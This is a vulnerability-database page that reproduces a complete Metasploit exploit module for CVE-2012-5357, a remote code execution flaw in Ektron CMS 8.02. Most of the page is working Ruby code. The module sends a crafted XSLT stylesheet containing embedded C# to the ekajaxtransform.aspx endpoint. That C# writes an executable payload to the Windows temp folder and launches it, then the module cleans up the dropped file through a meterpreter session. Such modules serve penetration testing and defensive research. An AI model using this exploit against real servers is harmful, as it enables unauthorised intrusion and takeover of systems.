Ektron 8.02 XSLT Transform Remote Code Execution

🗓️ 05 Dec 2012 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 32 Views

Ektron 8.02 XSLT Transform Remote Code Execution vulnerability in Ektron CMS 8.02 (before SP5). Allows execution of arbitrary code with NETWORK SERVICE privileges on Windows 2003 SP2

Reporter	Title	Published	Views	Family All 15
Circl	CVE-2012-5357	5 Dec 201200:00	–	circl
Check Point Advisories	Ektron XSLT Transform Remote Code Execution (CVE-2012-5357)	21 Jul 201300:00	–	checkpoint_advisories
CVE	CVE-2012-5357	30 Oct 201714:00	–	cve
Cvelist	CVE-2012-5357	30 Oct 201714:00	–	cvelist
Exploit DB	Ektron 8.02 - XSLT Transform Remote Code Execution (Metasploit)	5 Dec 201200:00	–	exploitdb
Tenable Nessus	Ektron CMS XslCompiledTransform Class Request Parsing Remote Code Execution	12 Dec 201200:00	–	nessus
EUVD	EUVD-2012-5279	7 Oct 202500:30	–	euvd
Metasploit	Ektron 8.02 XSLT Transform Remote Code Execution	3 Dec 201219:12	–	metasploit
msvr	Vulnerabilities in Ektron CMS Could Allow Arbitrary Code Execution	16 Oct 201200:00	–	msvr
NVD	CVE-2012-5357	30 Oct 201714:29	–	nvd

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/file_dropper'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ektron 8.02 XSLT Transform Remote Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The
        vulnerability exists due to the insecure usage of XslCompiledTransform, using a
        XSLT controlled by the user. The module has been tested successfully on Ektron CMS
        8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK
        SERVICE privileges.
      },
      'Author'         => [
        'Unknown', # Vulnerability discovery, maybe Richard Lundeen from http://webstersprodigy.net/ ?
        'juan vazquez' # Metasploit module
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2012-5357'],
          [ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
        ],
      'Payload'        =>
        {
          'Space'           => 2048,
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Privileged'     => true,
      'Targets'        =>
        [
          ['Windows 2003 SP2 / Ektron CMS400 8.02', { }],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 16 2012'
    ))

    register_options(
      [
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])
      ], self.class )
  end

  def check

    fingerprint = rand_text_alpha(5 + rand(5))
    xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
    XSLT

    res = send_request_cgi(
      {
        'uri'     => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
        'version' => '1.1',
        'method'  => 'POST',
        'ctype'   => "application/x-www-form-urlencoded; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'vars_post'    => {
          "xml" => rand_text_alpha(5 + rand(5)),
          "xslt" => xslt_data
        }
      })

    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end


  def on_new_session(session)
    if session.type == "meterpreter"
      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
    end

    @dropped_files.delete_if do |file|
      win_file = file.gsub("/", "\\\\")
      if session.type == "meterpreter"
        begin
          windir = session.fs.file.expand_path("%WINDIR%")
          win_file = "#{windir}\\Temp\\#{win_file}"
          # Meterpreter should do this automatically as part of
          # fs.file.rm().  Until that has been implemented, remove the
          # read-only flag with a command.
          session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
          session.fs.file.rm(win_file)
          print_good("Deleted #{file}")
          true
        rescue ::Rex::Post::Meterpreter::RequestError
          print_error("Failed to delete #{win_file}")
          false
        end

      end
    end

  end

  def uri_path
    uri_path = target_uri.path
    uri_path << "/" if uri_path[-1, 1] != "/"
    uri_path
  end

  def build_referer
    if datastore['SSL']
      schema = "https://"
    else
      schema = "http://"
    end

    referer = schema
    referer << rhost
    referer << ":#{rport}"
    referer << uri_path
    referer
  end

  def exploit

    print_status("Generating the EXE Payload and the XSLT...")
    exe_data = generate_payload_exe
    exe_string = Rex::Text.to_hex(exe_data)
    exename = rand_text_alpha(5 + rand(5))
    fingerprint = rand_text_alpha(5 + rand(5))
    xslt_data = <<-XSLT
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
char[] charData = "#{exe_string}".ToCharArray();
string fileName = @"C:\\windows\\temp\\#{exename}.txt";
System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);
System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);
for (int i = 0; i < charData.Length; i++)
{
  bw.Write( (byte) charData[i]);
}
bw.Close();
fs.Close();
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";
p.Start();
return "#{fingerprint}";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>
    XSLT

    print_status("Trying to run the xslt transformation...")
    res = send_request_cgi(
      {
        'uri'     => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
        'version' => '1.1',
        'method'  => 'POST',
        'ctype'   => "application/x-www-form-urlencoded; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'vars_post'    => {
          "xml" => rand_text_alpha(5 + rand(5)),
          "xslt" => xslt_data
        }
      })
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      print_good("Exploitation was successful")
      register_file_for_cleanup("#{exename}.txt")
    else
      fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
    end

  end
end

#  0day.today [2018-03-19]  #

05 Dec 2012 00:00Current

1Low risk

Vulners AI Score1

EPSS0.67776